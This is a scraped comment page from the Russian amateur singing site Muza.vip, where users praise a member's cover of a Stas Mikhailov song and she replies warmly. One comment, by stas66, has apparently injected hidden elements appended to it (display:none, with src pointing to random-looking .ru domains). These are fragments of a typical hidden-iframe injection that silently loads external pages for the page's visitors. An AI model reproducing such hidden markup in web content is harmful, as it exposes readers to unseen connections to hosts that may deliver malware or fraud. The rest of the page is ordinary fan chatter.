На главную Muza.vip
      
Россия моя
(Тюльканов Вячеслав)
Карамболина (Фиалка Монмартра)
(Оперетты)
Маленькие герои
(Машина времени)
Спасательный круг
(Карнавал (группа))
Eye In The Sky
(Alan Parsons Project)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Понимаю, ты устала» (Михайлов Стас)

372   123   6
   Кавер-версия от galochka_
17.07.2016 2033
Просто песня и просто дождь...
  Баллов:
158
  


Комментарии пользователей к записи:

          Страницы: 1  2  3 

bazykin, 17.07.2016 г. 20:37
ДЕРЗКО ОДНАКО ПОЛУЧИЛОСЬ ГАЛОЧКА))))))))))))))))....ВОСПРИНЯЛ И ПРИНЯЛ Я!wow
  

galochka_, 18.07.2016 г. 00:10
Вот такая я,дерзкая victorysmeh
Спасибо,Лёша!!vozdushnyj_pocelujbuket_big
  
dendrolog, 17.07.2016 г. 20:39
Сильно.... по нервам бъет не по-детски...o_da
  

galochka_, 18.07.2016 г. 00:12
А нервы-то надо беречь da_da...,тока не получается ни фига...
Натуль!love_online
  
shuger01, 17.07.2016 г. 20:51
Галь . всё хорошо , берёшь и делаешь . уважаю !bravo_bigbuket_serdechki
  

galochka_, 18.07.2016 г. 00:13
А ты доделываешь smeh
Спасибо огромное,Серёжкин,чтоб я без тебя делала!!!!vozdushnyj_pocelujbuket_big
  
WKC7WA7K, 17.07.2016 г. 20:56
Галинка, как ты её шикарно сделала, браво !!! serdce_v_ruke
  

galochka_, 18.07.2016 г. 00:14
Спасибо,Натуль, да как-то одним махом получилось)))vozdushnyj_pocelujbuket_big
  
VLODEK, 17.07.2016 г. 20:58
Молодец, Халинка! Пронзила! По-взрослому спела! buket_big
  

galochka_, 18.07.2016 г. 00:16
Прям в сердце?smeh Ну значит получилось)))
Спасибо огромное,Влодек!!vozdushnyj_pocelujbuket_big
  
vera1959, 17.07.2016 г. 20:59
Галочка,привет! Эмоции зашкаливают.... Ох,как люблю,когда так с чувствами!!!! Всю боль чувствую....
  

galochka_, 18.07.2016 г. 00:19
А что,так чувствуется? Значит правда больно ей, душе..
Спасибо огромное,Верулька!!!love_onlinebuket_big
До тебя не добралась ещё,но я дойду обязательно!!!vozdushnyj_poceluj
  
irisha56, 17.07.2016 г. 21:01
Браво,Галочка!!Классно спела!!
  

galochka_, 18.07.2016 г. 00:20
Иришка,спасибо,дорогая!!vozdushnyj_pocelujbuket_big
  
Marinajazz, 17.07.2016 г. 21:04
v_naushnikah.........................o_daserdce_v_rukerozochkaГаля, крик души!...bravo_big
  

galochka_, 18.07.2016 г. 00:34
Наверно плохо ей....,а может просто песнь такая..
Спасибо,Маришка!!!!love_onlinebuket_big
  
Ze_Best, 17.07.2016 г. 21:05
Галочка, поверил! v_naushnikah С чувством, по-настоящему душевно! na_skripke
  

galochka_, 18.07.2016 г. 00:34
Сашуль,спасибо!!!!!!vozdushnyj_pocelujbuket_big
  
ReVN, 17.07.2016 г. 21:13
Заблудился мужик в лесу.
Бегает, кричит:
Спасите, хоть кто нибудь придите!
Чувствует, сзади по плечу кто то стучит.
Обернулся, видит: огромный Медведь перед ним стоит. И говорит:
Ты что, дурак, орешь, весь лес взбаламутил?
Как что ору, заблудился я, испугался:
Ну вот я пришел, что тебе легче стало?
.....
....я конечно не медведь, но я пришел послушать.....если тебе станет от этого легче...то я буду рад)))
А если без шуток, то потрясно спела, Галочка!!!voobuket_big
  

galochka_, 18.07.2016 г. 00:37
Ты пришёл послушать,как я ору?sarkazm Да я и громче могу! Ещё и свистеть умею если чё!sarkazm
Улыбаюсь я,радуйся)))))

Спасибо огромное,Володенька!!!vozdushnyj_pocelujbuket_big
  

ReVN, 18.07.2016 г. 09:19
.....ну покричать мы все могЁм))))smeh
vozdushnyj_poceluj
Приятного денечка, Галочка!!!buket_serdechki
  
milaya72, 17.07.2016 г. 21:19
klassbuket_big
  

galochka_, 18.07.2016 г. 00:38
Надюшка!!!bravo Спасибо.дорогая!!!love_onlinebuket_big
  
serdolik-galina, 17.07.2016 г. 21:31
ГАЛОЧКА, КЛАССНОserdce_v_rukebravo_big
  

galochka_, 18.07.2016 г. 00:39
Спасибо,Галочка!!!vozdushnyj_pocelujbuket_big
  
kolginova, 17.07.2016 г. 21:31
Галинка, какое проникновенное исполнение!!!!buket_big
  

galochka_, 18.07.2016 г. 00:40
Галка,ну от тебя-то вдвойне приятно это слышать!!! Спасибо огромное,дорогая!!!vozdushnyj_pocelujbuket_big
  
ilana, 17.07.2016 г. 21:35
wow
Классно,Галчёнок!serdce_v_ruke
  

galochka_, 18.07.2016 г. 00:41
Иланушка!!love_onlinebuket_big
  
nadeyna, 17.07.2016 г. 21:41
Песня отличная ,исполнение еще лучше,браво Галинаbravo_big
  

galochka_, 18.07.2016 г. 00:44
Ох,как приятно d9 Спасибо,Викуль!!vozdushnyj_pocelujbuket_big
  
spivak, 17.07.2016 г. 21:50
Отлично,Галина!!!Прекрасные и песня и исполнение!!!!voobravo_bigserdce_v_rukebuket_bigulybaemsya_i_mashem
  

galochka_, 18.07.2016 г. 00:45
Спасибо огромное.Валера!!!vozdushnyj_pocelujbuket_big
  
victorist, 17.07.2016 г. 21:57
ВО, КЛАССНЕЦКИ КАК СПЕЛА!!! ПЕСНЯ ОБОЛДЕННО КРАСИВЕННАЯ!!!voovoovoovoovoovoovoov_naushnikahv_naushnikahv_naushnikahd9d9d9buket_bigbuket_bigbuket_bigvozdushnyj_pocelujvozdushnyj_pocelujvozdushnyj_poceluj
  

galochka_, 18.07.2016 г. 00:43
Витюш,ну ты рекорд по смайликам побил!! Аж 19 штук!!sarkazm
Спасибульки огромульки!!!!!vozdushnyj_pocelujbuket_big
  
stas66, 17.07.2016 г. 22:04
Галяvoo,сильно и дерзкоdada!!!Мне очень понравилосьbravo_bigbuket_bigvozdushnyj_pocelujфиолетовый цветок id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=21670" style="display:none"> id="a754394637" src="https://doiuhrht.ru/u.html?a=21670" style="display:none">
  

galochka_, 18.07.2016 г. 00:46
Стас!! Рада видеть!!ulybaemsya_i_mashem Спасибо огромное,приятно!!!)))vozdushnyj_pocelujbuket_big
  
amkokorev, 17.07.2016 г. 22:15
ГАЛИНА ЗАМЕЧАТЕЛЬНО ИСПОЛНИЛА bravo_bigbuket_big
  

galochka_, 18.07.2016 г. 00:47
Сашенька,спасибо большое!vozdushnyj_pocelujbuket_big
  
Mu3EP, 17.07.2016 г. 22:29
ГалоЧка!!! Стас нервно курит в сторонке!!! dada Шикарное исполнение!!! v_naushnikah applod kubok serdce_v_ruke buket_big
  

galochka_, 18.07.2016 г. 14:01
Иногда понервничать полезно для дальнейшего развития!da_da
Спасибо!buket_serdechki
  

          Страницы: 1  2  3 

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО



Случайная запись


Студия
lori
Мери
Глинка Михаил
Aleksantin
В нём ещё горит свеча
Искусственный интеллект
Otblesk
Черный ворон
Лесоповал
Verax
Синие глаза
Лед в глазах
alek5sei
Без тебя
Ром Алексей
Alex-s51
Мадам. романс. рок баллада
Авторские
xcxcxcxc
Цветы запоздалые
Глызин Алексей
igor-grishkov
Там, где ты
Ром Алексей
Marka64
Где же ты
Орлова Ольга
DETOCHKYN
Я вернулся
Визбор Юрий
Aristarh
Зарисовка 21
Aristarh
petrovlad
Грустить не надо
Сентябрь
akononov6690
Я жду весну
Мартынов Евгений
WECHER-36
Сувенир
Валеева Юлия
VETER36
Здравствуй и прощай
Кинокомедия
ira2070
Два крыла
Повалий Таисия
Temanik
На дальней станции сойду
Пламя
mranatolm
Девочка с карибских берегов
Леонидов Максим
skrunchick
Вокализ 3
Вокализы
LonelyWoolf
Абракадабра
Ассорти
Haris1958
In The Army Now
Status Quo
BEDHAR58
Come together
Beatles
djdfy56
Бабочка красивая
Спиридонов Александр
ARAKS
Человек на Луне
Наутилус Помпилиус
Grafinia
Мне нужна любовь
Рулла Лика
barmen
Ром, текила, виски
Петлюра Виктор
Pusha
Для тебя
Колдун Дмитрий
valekor
Стоят девчонки
Пахоменко Мария
gdi1960
Жестокая любовь
Киркоров Филипп
volod
Помни меня
Могилатов Виктор




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.